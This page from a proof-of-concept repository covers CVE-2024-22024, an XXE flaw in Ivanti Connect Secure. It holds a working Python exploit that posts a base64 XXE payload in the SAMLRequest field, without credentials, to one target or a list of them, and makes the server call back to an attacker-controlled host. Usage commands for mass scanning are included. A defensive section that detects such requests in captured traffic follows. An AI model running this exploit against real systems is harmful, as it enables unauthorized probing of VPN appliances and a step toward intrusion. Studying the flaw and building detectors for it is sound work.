POC/wpoc/Ivanti/CVE-2024-22024.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

# Ivanti Pulse Connect Secure VPN XXE vulnerability (CVE-2024-22024)
Ivanti Pulse Connect Secure VPN contains an XML External Entity (XXE) vulnerability. An attacker can craft a malicious request that triggers the XXE and, combined with other functionality, achieve remote code execution. The PoC below posts a base64-encoded XML document in the `SAMLRequest` form field to `/dana-na/auth/saml-sso.cgi`; the request carries no session cookie or credentials. If the server-side parser resolves the external parameter entity in the document's DTD, it makes an out-of-band request to the attacker-controlled URL, which is the signal that the target is vulnerable.
## Affected versions
- ivanti connect_secure 22.4
- ivanti connect_secure 22.5
- ivanti connect_secure 9.1
- ivanti policy_secure 22.5
- ivanti zero_trust_access 22.6
## PoC
```python
import base64
import requests
import argparse
from pathlib import Path
import urllib3
from urllib3.exceptions import InsecureRequestWarning

# Suppress only the single InsecureRequestWarning from urllib3 (caused by verify=False below)
urllib3.disable_warnings(InsecureRequestWarning)

'''
PoC by Abdulla
CVE-2024-22024 (XXE) for Ivanti Connect Secure and Ivanti Policy Secure
Remediation:
https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US
'''


def send_request(target_url, attacker_url, timeout):
    # DTD that declares an external parameter entity and references it; a parser
    # that resolves external entities fetches <attacker_url>/test at parse time,
    # which is the out-of-band signal this PoC relies on.
    xml_payload_template = """<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "{}"> %xxe;]><r></r>"""
    xml_payload = xml_payload_template.format(attacker_url + "/test")  # Format with the provided external URL
    encoded_payload = base64.b64encode(xml_payload.encode()).decode()  # SAML HTTP-POST binding: base64 in a form field
    data = {'SAMLRequest': encoded_payload}  # Data for POST request
    # Attempt the POST request with the specified timeout
    try:
        response = requests.post(target_url + "/dana-na/auth/saml-sso.cgi", data=data, verify=False, timeout=timeout)
        print(f"Response from {target_url}: {response.status_code}")
    except requests.exceptions.Timeout:
        print(f"Request to {target_url} timed out.")
    except Exception as e:
        print(f"Error sending request to {target_url}: {e}")


def main(target_urls, attacker_url, timeout):
    if Path(target_urls).is_file():  # If target_urls is a file path, one URL per line
        with open(target_urls, 'r') as file:
            urls = file.read().splitlines()
        for url in urls:
            send_request(url, attacker_url, timeout)
    else:  # Assume target_urls is a single URL
        send_request(target_urls, attacker_url, timeout)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure by Abdulla.")
    parser.add_argument("-u", "--target_url", required=True, help="The target URL or file with URLs where the SAML request should be sent")
    parser.add_argument("-c", "--attacker_url", required=True, help="The attacker URL to include in the XXE payload")
    parser.add_argument("-t", "--timeout", type=int, default=3, help="Timeout in seconds for the request (default is 3 seconds)")
    args = parser.parse_args()
    main(args.target_url, args.attacker_url, args.timeout)
```
### Parameters
- `-u` or `--target_url`: The target Ivanti Connect Secure (ICS) URL, or a file with one URL per line.
- `-c` or `--attacker_url`: The attacker-controlled callback URL (generate one using Burp Collaborator, ngrok, or a unique URL from [Webhook.site](https://webhook.site/)). The payload appends `/test` to it.
- `-t` or `--timeout`: Timeout in seconds for the request (default is 3 seconds).
### How to use
The script only prints the HTTP status code of each response; the status code on its own does not indicate vulnerability. The sign that a target resolved the external entity is an HTTP or DNS interaction at the attacker URL, so watch the collaborator/webhook listener after each run.

Testing a single URL:
```
python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com
```
Testing list of URLs:
```
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com
```
Using a different timeout (5 seconds):
```
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5
```
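The defensive side of the same exchange, as an added example that is not part of the original PoC, the author's code, or any Ivanti component: it rebuilds the PoC's `SAMLRequest` encoding, then decodes captured POST bodies for `/dana-na/auth/saml-sso.cgi` and reports any request whose DTD declares an external entity, using expat's declaration callbacks (which never fetch the entity). The record format `(source_ip, path, url-encoded body)`, the sample records and the addresses in them are constructed for the example; the attacker hostname `attacker.example` is a placeholder, not an indicator from the page.

```python
import base64
import binascii
import urllib.parse
from xml.parsers import expat

# Endpoint the PoC posts to; the detector only inspects requests for this path.
SAML_SSO_PATH = "/dana-na/auth/saml-sso.cgi"


def build_xxe_payload(callback_url: str) -> str:
    """Same DTD shape as the PoC: an external parameter entity that a resolving
    parser fetches from callback_url at parse time."""
    return ('<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "{}"> %xxe;]><r></r>'
            .format(callback_url))


def encode_saml_request(xml_doc: str) -> str:
    """SAML HTTP-POST binding: the XML travels base64-encoded in a form field."""
    return base64.b64encode(xml_doc.encode()).decode()


def decode_saml_request(value: str):
    """Reverse the POST-binding encoding. Returns None when the field is not
    valid base64 (such a value cannot be a SAML message, XXE or otherwise)."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def external_entities(xml_doc: str):
    """List every entity declared with a SYSTEM or PUBLIC identifier, using
    expat's DTD callbacks. Expat only hands external entities to an
    ExternalEntityRefHandler, and none is installed, so nothing is fetched."""
    found = []

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            found.append((name, bool(is_param), system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(xml_doc, True)
    except expat.ExpatError:
        pass  # declarations seen before a syntax error are still reported
    return found


def flag_xxe_attempts(records):
    """records: (source_ip, request_path, url-encoded POST body) tuples
    (constructed format for this example). Returns (source_ip, [entity URIs])
    for each saml-sso.cgi request whose SAMLRequest declares external entities."""
    hits = []
    for src, path, body in records:
        if path != SAML_SSO_PATH:
            continue
        for value in urllib.parse.parse_qs(body).get("SAMLRequest", []):
            xml_doc = decode_saml_request(value)
            if xml_doc is None:
                continue
            entities = external_entities(xml_doc)
            if entities:
                hits.append((src, [uri for _, _, uri in entities]))
    return hits


# Constructed sample records (not real traffic): a PoC-style request, a benign
# AuthnRequest, and an unrelated POST to another dana-na endpoint.
SAMPLE_RECORDS = [
    ("203.0.113.10", SAML_SSO_PATH,
     urllib.parse.urlencode({"SAMLRequest": encode_saml_request(
         build_xxe_payload("http://attacker.example/test"))})),
    ("198.51.100.7", SAML_SSO_PATH,
     urllib.parse.urlencode({"SAMLRequest": encode_saml_request(
         '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
         'ID="_1" Version="2.0" IssueInstant="2024-02-08T00:00:00Z"/>')})),
    ("198.51.100.9", "/dana-na/auth/url_default/welcome.cgi", "username=alice"),
]

if __name__ == "__main__":
    for src, uris in flag_xxe_attempts(SAMPLE_RECORDS):
        print(f"{src}: SAMLRequest declares external entity -> {', '.join(uris)}")
```

Run it as a script to see the PoC-style record flagged and the benign AuthnRequest pass. The check deliberately keys on entity declarations rather than on a specific callback hostname, so it catches the same payload with any collaborator domain; a plain web-server access log will not contain the POST body, so the records have to come from a proxy, WAF or full-packet capture that retains it.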
## Source
- https://github.com/lal0ne/vulnerability/tree/main/Ivanti/CVE-2024-22024